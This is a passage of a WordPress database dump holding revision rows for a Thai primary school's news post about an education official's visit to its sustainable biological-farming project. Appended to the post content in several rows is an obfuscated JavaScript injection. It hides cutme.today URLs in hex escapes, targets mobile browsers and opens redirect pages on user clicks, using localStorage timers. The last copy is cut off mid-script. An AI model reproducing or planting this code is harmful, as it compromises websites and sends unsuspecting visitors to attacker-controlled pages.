บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับ ได้เยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต','','inherit','closed','closed','','367-revision-v1','','','2024-09-12 13:38:47','2024-09-12 06:38:47','',367,'http://watprato.ssk.in.th/?p=374',0,'revision','',0),
(376,2,'2024-09-12 13:40:43','2024-09-12 06:40:43','<!-- wp:image {\"id\":373,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458199408_122175360092202781_7097423784924703217_n-1024x726.jpg\" alt=\"\" class=\"wp-image-373\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับ ได้เยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต รงเรียนอนุบาลวัดพระโตได้น้อมนำปรัชญาของเศรษฐกิจพอเพียงมาบูรณาการจัดการเรียนรู้ เพื่อพัฒนาคุณภาพผู้เรียน ตามรอยพระบาทศาสตร์พระราชา โคกหนองนาโมเดล และได้เข้าร่วมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน สืบสานพระราชเสาวนีย์ของสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567','','inherit','closed','closed','','367-revision-v1','','','2024-09-12 13:40:43','2024-09-12 06:40:43','',367,'http://watprato.ssk.in.th/?p=376',0,'revision','',0),
(378,2,'2024-09-12 13:41:46','2024-09-12 06:41:46','<!-- wp:image {\"id\":373,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458199408_122175360092202781_7097423784924703217_n-1024x726.jpg\" alt=\"\" class=\"wp-image-373\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับ ได้เยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน สืบสานพระราชเสาวนีย์ของสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567','','inherit','closed','closed','','367-revision-v1','','','2024-09-12 13:41:46','2024-09-12 06:41:46','',367,'http://watprato.ssk.in.th/?p=378',0,'revision','',0),
(379,2,'2024-09-12 13:43:10','2024-09-12 06:43:10','<!-- wp:image {\"id\":373,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458199408_122175360092202781_7097423784924703217_n-1024x726.jpg\" alt=\"\" class=\"wp-image-373\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 